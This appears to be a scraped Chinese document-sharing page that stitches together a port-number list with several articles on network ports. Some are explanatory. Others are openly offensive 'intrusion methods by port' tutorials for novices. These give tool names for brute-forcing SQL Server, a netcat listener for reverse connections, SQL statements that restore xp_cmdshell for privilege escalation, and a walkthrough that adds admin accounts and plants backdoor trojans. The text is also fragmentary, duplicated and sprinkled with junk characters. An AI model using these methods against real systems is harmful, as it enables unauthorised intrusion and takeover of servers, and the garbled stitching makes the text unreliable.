1434=Microsoft-SQL-Monitor

1435=IBM CISCibm-cics

1436=Satellite-data Acquisition System 2

1437=Tabulatabula

1438=Eicon Security Agent/Server

1439=Eicon X25/SNA Gateway

1440=Eicon Service Location Protocol

1441=Cadis License Management

1442=Cadis License Management

1443=Integrated Engineering Software

1444=Marcam License Management

1445=Proxima License Manager

1446=Optical Research Associates License Manager 1447=Applied Parallel Research LM

1448=OpenConnect License Manager

1449=PEportpeport

1450=Tandem Distributed Workbench Facility

1451=IBM Information Management

1452=GTE Government Systems License Man

1453=Genie License Manager

1454=interHDL License Manager

1454=interHDL License Manager

1455=ESL License Manager

1456=DCAdca

1457=Valisys License Manager

1458=Nichols Research Corp.

1459=Proshare Notebook Application

1460=Proshare Notebook Application

1461=IBM Wireless LAN

1462=World License Manager

1463=Nucleusnucleus

1464=MSL License Manager

1465=Pipes Platform

1466=Ocean Software License Manager

1467=CSDMBASEcsdmbase

1468=CSDMcsdm

1469=Active Analysis Limited License Manager 1470=Universal Analytics

1471=csdmbasecsdmbase

1472=csdmcsdm

1473=OpenMathopenmath

1474=Telefindertelefinder

1475=Taligent License Manager

1476=clvm-cfgclvm-cfg

1477=ms-sna-server

1478=ms-sna-base

1479=dberegisterdberegister

1480=PacerForumpacerforum

1481=AIRSairs

1482=Miteksys License Manager

1483=AFS License Manager

1484=Confluent License Manager

1485=LANSourcelansource

1486=nms_topo_serv

1487=LocalInfoSrvr

1488=DocStordocstor

1489=dmdocbrokerdmdocbroker

1490=insitu-confinsitu-conf

1491=anynetgateway

1492=stone-design-1

1493=netmap_lmnetmap_lm

1494=icaica

1495=cvccvc

1496=liberty-lmliberty-lm

1497=rfx-lmrfx-lm

1498=Watcom-SQLwatcom-sql

1499=Federico Heinz Consultora

1500=VLSI License Manager

1501=Satellite-data Acquisition System 3

1502=Shivashivadiscovery

1503=Databeamimtc-mcs

1504=EVB Software Engineering License Manager 1505=Funk Software, Inc.

1524=ingres

1525=oracle

1525=Prospero Directory Service non-priv

1526=Prospero Data Access Prot non-priv

1527=oracletlisrv

1529=oraclecoauthor

1600=issd

1651=proshare conf audio

1652=proshare conf video

1653=proshare conf data

1654=proshare conf request

1655=proshare conf notify

1661=netview-aix-1netview-aix-1 1662=netview-aix-2netview-aix-2 1663=netview-aix-3netview-aix-3 1664=netview-aix-4netview-aix-4 1665=netview-aix-5netview-aix-5 1666=netview-aix-6netview-aix-6 1986=cisco license management

1987=cisco RSRB Priority 1 port

1988=cisco RSRB Priority 2 port

1989=cisco RSRB Priority 3 port

1989=MHSnet systemmshnet

1990=cisco STUN Priority 1 port

1991=cisco STUN Priority 2 port

1992=cisco STUN Priority 3 port

1992=IPsendmsgipsendmsg

1993=cisco SNMP TCP port

1994=cisco serial tunnel port

1995=cisco perf port

1996=cisco Remote SRB port

1997=cisco Gateway Discovery Protocol 1998=cisco X.25 service (XOT)

1999=cisco identification port

2009=whosockami

2010=pipe_server

2011=raid

2012=raid-ac

2013=rad-am

2015=raid-cs

2016=bootserver

2017=terminaldb

2018=rellpack

2019=about

2019=xinupageserver

2020=xinupageserver

2021=xinuexpansion1

2021=down

2022=xinuexpansion2

2023=xinuexpansion3

2023=xinuexpansion4

2024=xinuexpansion4

2025=xribs

2026=scrabble

2027=shadowserver

2028=submitserver

2039=device2

2032=blackboard

2033=glogger

2034=scoremgr

2035=imsldoc

2038=objectmanager

2040=lam

2041=interbase

2042=isis

2043=isis-bcast

2044=primsl

2045=cdfunc

2047=dls

2048=dls-monitor

2065=Data Link Switch Read Port Number 2067=Data Link Switch Write Port Number 2201=Advanced Training System Program 2500=Resource Tracking system server 2501=Resource Tracking system client 2564=HP 3000 NS/VT block mode telnet 2784=world wide web - development 3049=ccmail

3264=ccmail, cc:mail/lotus

3333=dec-notes

3984=MAPPER network node manager 3985=MAPPER TCP/IP server

3986=MAPPER workstation server

3421=Bull Apprise portmapper

3900=Unidata UDT OS

4132=NUTS Daemonnuts_dem

4133=NUTS Bootp Server

4343=UNICALL

4444=KRB524

4672=remote file access server

5002=radio free ethernet

5010=TelepathStarttelelpathstart

5011=TelepathAttack

5050=multimedia conference control tool 5145=rmonitor_secure

5190=aol, America-Online

5300=HA cluster heartbeat

计算机端口说明

端口的分类 2019.5 端口(port )可以认为是计算机与外界通信交流的接口其中硬件领域的端口又称为接口例: USB 串行端口等软件领域的端口一般指互联网中面向连接服务和无连接服务的通信协议端口是一种抽象的结构包括一些数据结构和I/O (输入/输出), 端口是传输层的内容是面向连接的他们对应网络上一些相应的服务这些常用的服务可划分为 TCP 端口 (面向持续连接的如: 打电话 ) 和 UDP 端口( 比如: 写信发消息) 在网络中被命名和寻址的通信端口是一种可分配资源由网络开放系统参考模型(Open Syste Intercommection Reference Model OSI) 协议可知传输层和网络层的区别是传输层提供进程通信能力网络通信的最终地址不仅包括主机地址,还包括可描述进程的某种标识因此当应用程序调入内存后一般称为进程,通过系统调用与某个端口建立连接(绑定端口) 传输

层传给该端口的数据被相应的进程所接收相应进程发给传输层的数据都从该端口输出 在网络技术中端口大致分为两类一是物理意义上的商品如集线器交换机路由器等用于连接网络其他设配的接口二是逻辑意义上的端口一般指 TCP/IP 协议上的端口范围为: 0 ~~ 65535 比如: 浏览器网页使用 80 端口 FTP 服务使用 21 端口 公认端口 ?公认端口的端口号为 0 ~~ 1023 他们紧密 的绑定于一些服务通常这些端口的通信 明确表明了某种协议的服务比如: Telnet 使用 23号端口 DNS 服务使用 53 端口 注册端口 ?注册端口的端口号为 1024 ~~ 49151 他们 松散绑定于一些服务也就是说也些服务 绑定于这些端口这些端口同样用于许多 其他服务比如系统处理动态端口从 1024 左右开始 动态或私有端口

常用端口号大全

常用端口号大全(详细) [ 2007-7-23 22:42:00 | By: 梦精灵] ?21/tcp FTP 文件传输协议 ?22/tcp SSH 安全登录、文件传送(SCP)和端口重定向 ?23/tcp Telnet 不安全的文本传送 ?25/tcp SMTP Simple Mail Transfer Protocol (E-mail) ?69/udp TFTP Trivial File Transfer Protocol ?79/tcp finger Finger ?80/tcp HTTP 超文本传送协议(WWW) ?88/tcp Kerberos Authenticating agent ?110/tcp POP3 Post Office Protocol (E-mail) ?113/tcp ident old identification server system ?119/tcp NNTP used for usenet newsgroups ?220/tcp IMAP3 ?443/tcp HTTPS used for securely transferring web pages 端口:0 服务:Reserved 说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。 端口:1 服务:tcpmux 说明:这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在I NTERNET上搜索tcpmux并利用这些帐户。 端口:7 服务:Echo 说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。 端口:19 服务:Character Generator 说明:这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HAC KER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。

黑客必会的网络端口的基本常识

黑客必会的网络端口的基本常识 大家好我是冰峰,今天来讲讲很多人都在问我的这个网络端口的问题。有过一些黑客攻击方面知识的读者都会知道,其实那些所谓的黑客并不是像人们想象那样从天而降,而是实实在在从您的电脑'大门'中自由出入。电脑的'大门'就-是我们平常所说的'端口',它包括电脑的物理端口,如电脑的串口、并口、输入/输出设备以及适配器接口等(这些端口都是可见的),但更多的是不可见的软件端-口,在本文中所介绍的都是指'软件端口',但为了说明方便,仍统称为'端口'。本文仅就端口的基础知识进行介绍,一、端口简介随着电脑网络技术的发展,原来物理上的接口(如键盘、鼠标、网卡、显示卡等输入/输出接口)已不能满足网络通信的要求,TCP/IP 协议作为网络通信的标准协-议就解决了这个通信难题。 TCP/IP协议集成到操作系统的内核中,这就相当于在操作 系统中引入了一种新的输入/输出接口技术,因为在TCP/IP 协议中引入了-一种称之为'Socket(套接字)'应用程序接口。有了这样一种接口技术,一台电脑就可以通过软件的方式与任何一台具有Socket接口的电脑进行通信。-端口在电脑编程上也就是'Socket接口'。有了这些端口后,这些端口又是 如何工作呢?例如一台服务器为什么可以同时是Web服务器,也可以是FTP服务器,还可以是邮件服务器等等呢?其

中一个很重要的原-因是各种服务采用不同的端口分别提供不同的服务,比如:通常TCP/IP协议规定Web采用80号端口,FTP采用21号端口等,而邮件服务器是采用25号端口-。这样,通过不同端口,电脑就可以与外界进行互不干扰的通信。据专家们分析,服务器端口数最大可以有65535个,但是实际上常用的端口才几十个,由此可以看出未定义的端口相当多。这是那么多黑客程序都可以采用某种方法,-定义出一个特殊的端口来达到入侵的目的的原因所在。为了定义出这个端口,就要依靠某种程序在电脑启动之前自动加载到内存,强行控制电脑打开那个特殊的端口。-这个程序就是'后门'程序,这些后门程序就是常说的木马程序。简单的说,这些木马程序在入侵前是先通过某种手段在一台个人电脑 中植入一个程序,打开某个(些)-特定的端口,俗称'后门'(BackDoor),使这台电脑变成一台开放性极高(用户拥有极高权限)的FTP服务器,然后从后门就可以达到侵入的目的。二、端口的分类端口的分类根据其参考对象不同有不同划分方法,如果从端口的性质来分,通常可以分为以下三类:(1)公认端口(Well KnownPorts):这类端口也常称之为'常用端口'。这类端口的端口号从0到1024,它们紧密绑定于一些特定的服务。通常这些端口的通信明确表明了某种服务的协议-,这种端口是不可再重新定义它的作用对象。例如:80端口实际上总是HTTP通信所使用的,而23号端口则是

各个端口的入侵方法(入侵菜鸟必看)

各个端口的入侵方法(入侵菜鸟必看)1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后SQLTools.exe入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。(小榕的注入软件)。 5. serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)

====================================== 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A 6. 554端口 用real554.exe入侵。 7. 6129端口 用DameWare6129.exe入侵。 8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 10. 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。 各种端口的入侵方法1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPas*.**e 进行字典暴破(字典是关键) 最后SQLTool*.**e入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

PC端口详解

计算机端口详解 端口概念 在网络技术中,端口(Port)大致有两种意思:一是物理意义上的端口,比如,ADSL Modem、集线器、交换机、路由器用于连接其他网络设备的接口,如RJ-45端口、SC端口等等。二是逻辑意义上的端口,一般是指TCP/IP协议中的端口,端口号的范围从0到65535,比如用于浏览网页服务的80端口,用于FTP服务的21端口等等。我们这里将要介绍的就是逻辑意义上的端口。 端口分类 逻辑意义上的端口有多种分类标准,下面将介绍两种常见的分类: 1. 按端口号分布划分 (1)知名端口(Well-Known Ports) 知名端口即众所周知的端口号,范围从0到1023,这些端口号一般固定分配给一些服务。比如21端口分配给FTP服务,25端口分配给SMTP(简单邮件传输协议)服务,80端口分配给HTTP服务,135端口分配给RPC(远程过程调用)服务等等。 (2)动态端口(Dynamic Ports) 动态端口的范围从1024到65535,这些端口号一般不固定分配给某个服务,也就是说许多服务都可以使用这些端口。只要运行的程序向系统提出访问网络的申请,那么系统就可以从这些端口号中分配一个供该程序使用。比如1024端口就是分配给第一个向系统发出申请的程序。在关闭程序进程后,就会释放所占用的端口号。 不过,动态端口也常常被病毒木马程序所利用,如冰河默认连接端口是7626、WAY 2.4是8011、Netspy 3.0是7306、YAI病毒是1024等等。 2. 按协议类型划分 按协议类型划分,可以分为TCP、UDP、IP和ICMP(Internet控制消息协议)等端口。下面主要介绍TCP和UDP端口: (1)TCP端口 TCP端口,即传输控制协议端口,需要在客户端和服务器之间建立连接,这样可以提供可靠的数据传输。常见的包括FTP服务的21端口,Telnet服务的23端口,SMTP服务的25端口,以及HTTP服务的80端口等等。 (2)UDP端口 UDP端口,即用户数据包协议端口,无需在客户端和服务器之间建立连接,安全性得不到保障。常见的有DNS服务的53端口,SNMP(简单网络管理协议)服务的161端口,QQ使用的8000和4000端口等等。 查看端口 在Windows 2000/XP/Server 2003中要查看端口,可以使用Netstat命令: 依次点击"开始→运行",键入"cmd"并回车,打开命令提示符窗口。在命令提示符状态下键入"netstat -a -n",按下回车键后就可以看到以数字形式显示的TCP和UDP连接的端口号及状态。 小知识:Netstat命令用法 命令格式:Netstat -a -e -n -o -s

利用SQL之1433端口巧妙入侵服务器

利用SQL之1433端口巧妙入侵服务器 利用1433端口提权 相信大家扫到很多1433 都提示用net net1 提权都说拒绝访问!且又无法上传!今天给大家针对Net 没权限情况的提权方法; 1、未找到储存过程!那就来修复下吧! 用到SQL语句: xp_cmdshell新的恢复办法 第一步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 第二步恢复: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 直接恢复,不管sp_addextendedproc是不是存在 图1

2、修复好了!又出现问题了!xplog70.dll被删除了!看来只有用授鱼的那修复法!图2

3、d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL 找到了哈哈! 图3

4、恢复! 用到SQL语句: 第一 exec sp_dropextendedproc 'xp_cmdshell' 第二 dbcc addextendedproc ("xp_cmdshell","d:\应用软件 \SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL") 恢复好了

计算机端口详解与常见端口入侵方法

计算机“端口”是英文port的义译,可以认为是计算机与外界通讯交流的出口。其中硬件领域的端口又称接口,如:USB端口、串行端口等。软件领域的端口一般指网络中面向连接服务和无连接服务的通信协议端口,是一种抽象的软件结构,包括一些数据结构和I/O(基本输入输出)缓冲区。 可以先了解面向连接和无连接协议(Connection-Oriented and Connectionless Protocols) 面向连接服务的主要特点有:面向连接服务要经过三个阶段:数据传数前,先建立连接,连接建立后再传输数据,数据传送完后,释放连接。面向连接服务,可确保数据传送的次序和传输的可靠性https://www.doczj.com/doc/1d14961343.html,无连接服务的特点是:无连接服务只有传输数据阶段。消除了除数据通信外的其它开销。只要发送实体是活跃的,无须接收实体也是活跃的。它的优点是灵活方便、迅速,特别适合于传送少量零星的报文,但无连接服务不能防止报文的丢失、重复或失序。 区分“面向连接服务”和“无连接服务”的概念,特别简单、形象的例子是:打电话和写信。两个人如果要通电话,必须先建立连接——拨号,等待应答后才能相互传递信息,最后还要释放连接——挂电话。写信就没有那么复杂了,地址姓名填好以后直接往邮筒一扔,收信人就能收到。TCP/IP协议在网络层是无连接的(数据包只管往网上发,如何传输和到达以及是否到达由网络设备来管理)。而“端口”,是传输层的内容,是面向连接的。协议里面低于1024的端口都有确切的定义,它们对应着因特网上常见的一些服务。这些常见的服务可以划分为使用TCP端口(面向连接如打电话)和使用UDP端口(无连接如写信)两种。 网络中可以被命名和寻址的通信端口是操作系统的一种可分配资源。由网络OSI(开放系统互联参考模型,Open System Interconnection Reference Model)七层协议可知,传输层与网络层最大的区别是传输层提供进程通信能力,网络通信的最终地址不仅包括主机地址,还包括可描述进程的某种标识。所以TCP/IP协议提出的协议端口,可以认为是网络通信进程的一种标识符https://www.doczj.com/doc/1d14961343.html, 应用程序(调入内存运行后一般称为:进程)通过系统调用与某端口建立连接(binding,绑定)后,传输层传给该端口的数据都被相应的进程所接收,相应进程发给传输层的数据都从该端口输出。在TCP/IP协议的实现中,端口操作类似于一般的I/O操作,进程获取一个端口,相当于获取本地唯一的I/O文件,可以用一般的读写方式访问https://www.doczj.com/doc/1d14961343.html, 类似于文件描述符,每个端口都拥有一个叫端口号的整数描述符,用来区别不同的端口。由于TCP/IP传输层的TCP和UDP两个协议是两个完全独立的软件模块,因此各自的端口号也相互独立。如TCP有一个255号端口,UDP也可以有一个255号端口,两者并不冲突https://www.doczj.com/doc/1d14961343.html, 端口号有两种基本分配方式:第一种叫全局分配这是一种集中分配方式,由一个公认权威的中央机构根据用户需要进行统一分配,并将结果公布于众,第二种是本地分配,又称动态连接,即进程需要访问传输层服务时,向本地操作系统提出申请,操作系统返回本地唯一的端口号,进程再通过合适的系统调用,将自己和该端口连接起来(binding,绑定)。TCP/IP 端口号的分配综合了以上两种方式,将端口号分为两部分,少量的作为保留端口,以全局方式分配给服务进程。每一个标准服务器都拥有一个全局公认的端口叫周知口,即使在不同的机器上,其端口号也相同。剩余的为自由端口,以本地方式进行分配。TCP和UDP规定,小于256的端口才能作为保留端口。 按端口号可分为3大类: (1)公认端口(Well Known Ports):从0到1023,它们紧密绑定(binding)于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。(2)注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也

常用的端口入侵

21端口: 21端口是默认的FTP端口,利用方式:弱口令探测/溢出 目前我还没看到远程溢出的,SERU的本地溢出漏洞风靡一时,曾经很多服务器就在沦丧于这个漏洞。 22端口 22端口是SSH远程登录协议,利用方式:弱口令探测 23端口 23端口是TLENET的默认端口,利用方式:弱口令探测/溢出 一般大家用弱口令探测得比较多,但是成功率比较低,还是溢出来得快,毕竟权限高,想做什么都可以! 25端口 25端口是SMTP协议的默认端口,邮件接收服务器。利用方式:溢出 53端口 53端口是DNS服务的默认端口,提供域名服务器, 利用方式:溢出。这个今年很火,我试了一下,一晚上差不多可以溢出10W台开几抬肉鸡的话 79端口 79端口Finger服务的默认端口(查询远程主机在线用户等信息),可以在辅助入侵中获取更多的主机信息。利用FINGER服务可以查询到主机很多敏感的信息,在入侵的时候常常可以起到意想不到的作用。

80端口 80端口是IIS的默认端口,全球信息网超文本传输协议(www)。利用方式:IIS溢出/SQL注入/旁注/跨站。不过一部分路由器的远程管理端口也是80。SQL注入大家已经很熟悉了吧,IIS溢出也只存在那些很老的机器上,看运气了。 110端口 110端口提供 Pop3 服务。邮件发送服务器。利用方式:溢出。 135端口 135端口提供查询服务。利用方式:IPC$(Internet Process Connection)入侵。 网上教程非常多,不多说了。 137端口 137端口统共NetBIOS 数据报(UDP)服务。 139端口 139端口提供共享资源服务(NetBios-SSN),用在IPC$入侵中。上面这三个端口可以综合利用。 161端口 161端口是远程管理设备(SNMP)的默认端口。这个很多小菜不知道怎么利用,那么重点来说说这个。 SNMP是简单网络管理协议,不清楚百度一下,很多小菜扫描出来了SNMP的弱口令,比如private,public等等,但是不知道怎么利用,这里介绍两款工具:IP NetWork browse 和LANguard NetWork Scnaner,这两个工具都可以扫描SNMP,而且可以扫描到,磁盘,服务,

常用入侵端口

常用入侵端口.txt为什么我们在讲故事的时候总要加上从前?开了一夏的花,终落得粉身碎骨,却还笑着说意义。端口:0 服务:Reserved 说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。 端口:1 服务:tcpmux 说明:这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,默认情况下tcpmux 在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。 端口:7 服务:Echo 说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。 端口:19 服务:Character Generator 说明:这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS 攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。 端口:21 服务:FTP 说明:FTP服务器所开放的端口,用于上传、下载。最常见的攻击者用于寻找打开anonymous 的FTP服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。 端口:22 服务:Ssh 说明:PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点,如果配置成特定的模式,许多使用RSAREF库的版本就会有不少的漏洞存在。 端口:23 服务:Telnet 说明:远程登录,入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术,入侵者也会找到密码。木马Tiny Telnet Server 就开放这个端口。 端口:25 服务:SMTP

135端口入侵的方法(简单)

135端口入侵的方法(简单) (1)通过135端口入侵,攻击者首先需要查找网络上存在135端口漏洞的主机地址,在查找此类主机过程中,可以使用一些扫描工具,比如SuperScan就是典型的端口工具之一。在SuperScan“开始”文本框中输入需要扫描的起始地址,然后在“结束”文本框里填写好扫描结束的IP地址,在“扫描类型”选项中选择“所有端口定义”单选按钮,并在右侧的文本框中输入“135”。再点击“开始”按钮即可开始扫描。扫描结束后,在下方的列表中可以查看目标主机打开的端口。然后再点击“Save”按钮选好保存路径,把里面有漏洞的IP整理下即可。 (2)得到有漏洞后,我们还有一个功能强大的扫描工具,比如NTSscn汉化版。然后在“主机文件“处点击“打开”按钮找到我们刚才保存的IP路径,在连接共享$处选择“WMI扫描”,在“扫描打开端口的主机”处填写135端口。最后点击“开始”即可。要不了多久就会有结果显示。 (3)获得漏洞主机用户名以后,我们需要一个开启的工具,那就是Recton v2.5。好了,万事具备之欠那“东风”拉。把刚刚扫描的IP输入TELNET界面的“远程主机”处,以及用户名和密码,不过一般情况下密码都是空。下一步点击“开始执行”按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车,会提示让你输入用户名,把用户名输入后,回车即可进入主机。而且得到的还是SYSTEM 权限。 下一步就是为我们加了拥有管理员权限的用户,看看我杰作。最后我们可以上传一些远程性木马软件作为后门,比如灰鸽子,冰河等。在这里我就不在展示。我还是喜欢3389端口,那我就给他上传个开启3389的脚本,不过对于开启3389端口的工具网上还真的不少,比如Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的

网络端口及其详解

网络端口及其详解 按端口号可分为3大类: (1)公认端口(Well Known Ports):从0到1023,它们紧密绑定(binding)于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。 (2)注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。 (3)动态和/或私有端口(Dynamic and/or Private Ports):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。 0 通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描:使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。 1tcpmux TCP Port Service Multiplexer传输控制协议端口服务多路开关选择器 2compressnet Management Utility compressnet 管理实用程序 3compressnet Compression Process压缩进程 5rje Remote Job Entry远程作业登录 7echo Echo回显 9discard Discard丢弃 11systat Active Users在线用户 13daytime Daytime时间 17qotd Quote of the Day每日引用 18msp Message Send Protocol消息发送协议 19chargen Character Generator字符发生器 20ftp-data File Transfer[Default Data]文件传输协议(默认数据口) 21ftp File Transfer[Control]文件传输协议(控制) 22ssh SSH Remote Login Protocol SSH远程登录协议 23telnet Telnet终端仿真协议 24any private mail system预留给个人用邮件系统 25smtp Simple Mail Transfer简单邮件发送协议 27nsw-fe NSW User System FE NSW 用户系统现场工程师 29msg-icp MSG ICP MSG ICP 31msg-auth MSG Authentication MSG验证 33dsp Display Support Protocol显示支持协议 35any private printer server预留给个人打印机服务 37time Time时间 38rap Route Access Protocol路由访问协议 39rlp Resource Location Protocol资源定位协议 41graphics Graphics图形 42nameserver WINS Host Name Server WINS 主机名服务 43nicname Who Is"绰号" who is服务 44mpm-flags MPM FLAGS Protocol MPM(消息处理模块)标志协议 45mpm Message Processing Module [recv]消息处理模块

黑客常用的几种入侵端口的方法

【托管服务qin】黑客常用的几种入侵端口的方法 服务器托管, BGP, 光钎专线, 防火墙, 新一代IDC 工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入 侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。" ^' D( E3 K! N) ^! c 1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键)7 L5 a9 T" E: C& x' k* C 最后SQLTools.exe入侵4 r+ F" q g9 j- K9 m* x4 o' E =============================2 z0 ~3 T) K5 n8 W; Z 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功)) Q) Q7 K+ L! J$ o6 Z9 w( a sqlhelloz.exe 入侵ip 1433 (这个是正向连接)% J3 L6 x8 y: t; p 2. 4899端口入侵9 `" f0 r# k2 ^: F 用4899过滤器。exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe)* X8 }: O! |2 }& x7 M 4. 80入侵+ J9 [0 L4 _) B! K 对sp3以前的机器,可以用webdav入侵;

端口分析

查看端口 在Windows 2000/XP/Server 2003中要查看端口,可以使用Netstat命令: 依次点击“开始→运行”,键入“cmd”并回车,打开命令提示符窗口。在命令提示符状态下键入“netstat -a -n”,按下回车键后就可以看到以数字形式显示的TCP 和UDP连接的端口号及状态。 小知识:Netstat命令用法 命令格式:Netstat -a -e -n -o -s -a 表示显示所有活动的TCP连接以及计算机监听的TCP和UDP端口。 -e 表示显示以太网发送和接收的字节数、数据包数等。 -n 表示只以数字形式显示所有活动的TCP连接的地址和端口号。 -o 表示显示活动的TCP连接并包括每个连接的进程ID(PID)。 -s 表示按协议显示各种连接的统计信息,包括端口号。 关闭/开启端口 在介绍各种端口的作用前,这里先介绍一下在Windows中如何关闭/打开端口,因为默认的情况下,有很多不安全的或没有什么用的端口是开启的,比如Telnet 服务的23端口、FTP服务的21端口、SMTP服务的25端口、RPC服务的135端口等等。为了保证系统的安全性,我们可以通过下面的方法来关闭/开启端口。 关闭端口 比如在Windows 2000/XP中关闭SMTP服务的25端口,可以这样做:首先打开“控制面板”,双击“管理工具”,再双击“服务”。接着在打开的服务窗口中找到并双击“Simple Mail Transfer Protocol (SMTP)”服务,单击“停止”按钮来停止该服务,然后在“启动类型”中选择“已禁用”,最后单击“确定”按钮即可。这样,关闭了SMTP服务就相当于关闭了对应的端口。 开启端口 如果要开启该端口只要先在“启动类型”选择“自动”,单击“确定”按钮,再打开该服务,在“服务状态”中单击“启动”按钮即可启用该端口,最后,单击“确定”按钮即可。 21端口:21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务。 23端口:23端口主要用于Telnet(远程登录)服务,是Internet上普遍

常见端口对照表

常见端口对照表 端口:0 服务:Reserved 说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。 端口:1 服务:tcpmux 说明:这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。 端口:7 服务:Echo 说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。 端口:19 服务:Character Generator 说明:这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP 连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP 的数据包,受害者为了回应这些数据而过载。 端口:21 服务:FTP 说明:FTP服务器所开放的端口,用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP 服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash 和Blade Runner所开放的端口。 端口:22 服务:Ssh 说明:PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点,如果配置成特定的模式,许多使用RSAREF库的版本就会有不少的漏洞存在。 